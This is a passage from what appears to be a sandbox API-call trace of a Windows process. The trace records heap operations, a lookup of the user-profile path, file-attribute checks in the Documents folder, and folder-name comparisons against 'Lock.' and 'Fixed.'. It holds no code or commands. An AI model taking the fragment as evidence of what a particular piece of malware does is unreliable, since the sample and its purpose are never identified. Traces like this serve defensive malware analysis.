(in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0264.291] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0264.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0264.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0264.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0264.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0264.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0264.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0264.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0264.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0264.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0264.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0264.292] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0264.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0264.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0264.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ab0 [0264.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0264.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0264.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ee8 [0264.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0264.292] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0264.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0264.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0264.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0264.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0264.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0264.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0264.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0264.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0264.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0264.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0264.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0264.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0264.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0264.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0264.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0264.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0264.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0264.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0264.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0264.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0264.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0264.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0264.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0264.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0264.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0264.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0264.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0264.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0264.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0264.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0264.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0264.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0264.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0264.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0264.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0264.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0264.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0264.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0264.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0264.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x70) returned 0x240c8d0 [0264.295] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/MlLRhGX00a.pptx", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MlLRhGX00a.pptx", lpFilePart=0x8bf658*="MlLRhGX00a.pptx") returned 0x37 [0264.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240c8d0 | out: hHeap=0x25c0000) returned 1 [0264.295] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MlLRhGX00a.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mllrhgx00a.pptx")) returned 0xffffffff [0264.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0264.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0264.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0264.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0264.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0264.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0264.296] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0264.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0264.296] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0264.296] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0264.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0264.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0264.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0264.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0264.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0264.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0264.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0264.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0264.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0264.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0264.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0264.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0264.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0264.297] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="My Music", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0264.297] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y Music", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0264.297] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Music", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0264.297] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0264.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0264.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0264.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0264.297] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0264.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0264.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0264.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0264.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0264.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0264.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="My Music", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0264.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y Music", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0264.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Music", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0264.298] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0264.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0264.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0264.298] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0264.298] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0264.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0264.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0264.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ab0 [0264.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0264.298] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0264.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0264.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0264.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa110 [0264.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0264.299] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0264.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0264.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0264.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0264.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0264.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0264.299] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0264.299] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.299] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0264.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0264.299] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0264.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0264.300] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0264.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0264.300] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0264.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0264.300] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/My Music", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x268c2, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 0xaa5820 [0264.300] FindClose (in: hFindFile=0xaa5820 | out: hFindFile=0xaa5820) returned 1 [0264.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0264.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0264.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0264.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0264.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0264.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0264.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0264.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0264.301] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0264.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0264.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0264.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0264.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0264.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0264.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0264.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0264.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0264.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0264.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0264.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0264.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0264.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0264.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0264.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0264.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0264.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0264.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0264.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0264.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0264.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0264.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0264.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0264.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0264.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0264.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0264.303] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0264.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0264.303] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0264.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0264.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0264.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa740 [0264.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0264.304] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0264.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0264.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0264.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0264.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0264.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0264.304] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0264.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0264.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0264.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0264.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0264.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0264.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0264.305] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0264.305] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0264.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0264.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0264.306] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0264.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0264.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9420 [0264.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0264.306] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0264.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0264.306] 